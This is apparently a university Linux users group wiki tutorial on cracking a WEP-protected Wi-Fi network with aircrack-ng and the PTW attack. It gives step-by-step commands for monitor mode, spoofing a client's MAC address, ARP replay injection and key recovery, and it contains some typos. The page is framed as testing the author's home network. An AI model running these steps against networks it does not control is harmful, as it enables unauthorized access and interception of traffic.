From UVA Linux Users Group
TODO: the whole thing in detail
WEP is not secure. This has been known since Fluher, Mantin, and Shamir published their paper Weaknesses in the Key Scheduling Algorithm of RC4, File:Fms.pdf. Their attack was implemented in suite of tools called aircrack-ng. Recently, Erik Tews, Ralf-Philipp Weinmann, and Andrei Pyshkin have created a faster attack which is described here, and in detail File:PTW.pdf. They claim,
We were able to extend Klein's attack and optimize it for usage against WEP. Using our version, it is possible to recover a 104 bit WEP key with probability 50% using just 40,000 captured packets. For 60,000 available data packets, the success probability is about 80% and for 85,000 data packets about 95%. Using active techniques like deauth and ARP re-injection, 40,000 packets can be captured in less than one minute under good condition. The actual computation takes about 3 seconds and 3 MB main memory on a Pentium-M 1.7 GHz and can additionally be optimized for devices with slower CPUs. The same attack can be used for 40 bit keys too with an even higher success probability
Using the PTW attack is very powerful, making WEP a 5 minute hurdle. I wrote this page to document my experience of cracking my home network with a Toshiba satellite laptop containing a PRO/Wireless 2200BG card.
aircrack-ng - http://www.aircrack-ng.org/doku.php
- 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured.
You will want the newest version because it supports the newer PTW crack method, which is much faster. http://www.aircrack-ng.org/doku.php?id=Main#stable
If you dont want to use the PTW method then you can install version 0.6.2 with apt-get,
apt-get install aircrack-ng
You must have a wireless card which supports packet injection and monitor mode, check this page to see if you card will work http://www.aircrack-ng.org/doku.php?id=compatibility_drivers.
If you dont understand anything on that page read this page http://www.aircrack-ng.org/doku.php?id=compatible_cards
For packet injection with the ipw2200 you need to install a newer driver, and the 802.11 lib. I followed this tutorial [http://www.aircrack-ng.org/doku.php?id=ipw2200]
Variables in this Howto
- eth1 - wireless card
- ESSID - network name
- BSSID - mac address of AP
- STATION - mac address of a client associated with the AP
Place card in Monitor mode
In order to crack wep you are going to need a wireless card which can be put into monitor mode. This is done with the airmon command provided by the aircrack suite.
airomon start eth1
Or you can use iwconfig,(TODO: make sure these commands are equivalent)
sudo iwconfig eth1 mode monitor
If you receive an error such as this device does not support monitor mode, then you should try to get a better driver for your card.
There are various utilities for discovering and monitoring traffice on wlan's. Kismet and airodump-ng are pretty popular. I will document using ariodump because it is provided with the aircrack-ng suite. First dump only the traffic which has wep on it, since these are the only networks we can crack.
airodump-ng --encrypt wep rtap0
You should see a bunch of information. here is the important parts
- BSSID - the MAC of the AP.
- ESSID - the network name.
- STATION - an associated clients MAC address.
- CH - channel of the network.
To pick a good target you want a client (STATION) which is generating data, and is associated with a BSSID. The second row of data should show both BSSID and STATION address, with a few (~>10) packets generated. note: if your card supports fake-auth injection then you dont need a client, the ipw2200 does not support this. Now that we have picked the network ESSID and have a target AP BSSID we can start the injection.
While loop hack for ipw2200
This is a hack needing to allow the ipw2200 driver to inject packets correctly. It toggles the card from monitor to managed mode and provides a bogus key. If you don't have a ipw2200 then you can probably skip this part.
while [ 1 ]; do iwconfig eth1 mode managed essid $ESSID key ffff-ffff; sleep 1; iwconfig eth1 key off; sleep 20 ; done;
Open a new terminal and
airodump-ng --bssid $BSSID -w $CAPTUREFILE rtap0
when you see some traffic from a client of the AP you want to attack, then record his MAC as CLIENT. We will use his MAC address as ours.
To generate enough useful data to allow us to crack the wep key in a short time, we need to force the AP to produce a lot of initialization vectors, IV's. This is done with aireplay-ng. Open a new terminal and start injecting,
aireplay-ng --arpreplay -b $BSSID -h $CLIENT -i rtap0 eth1
note: the rtap0 interface is specific to the ipw2200 driver. If you have a different driver leave this out.
Once you have the injection working, open a new terminal and start the crack
aircrack-ng -z -b $BSSID $CAPTUREFILE-0.cap
Kismet - http://www.kismetwireless.net/
- 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.
apt-get install kismet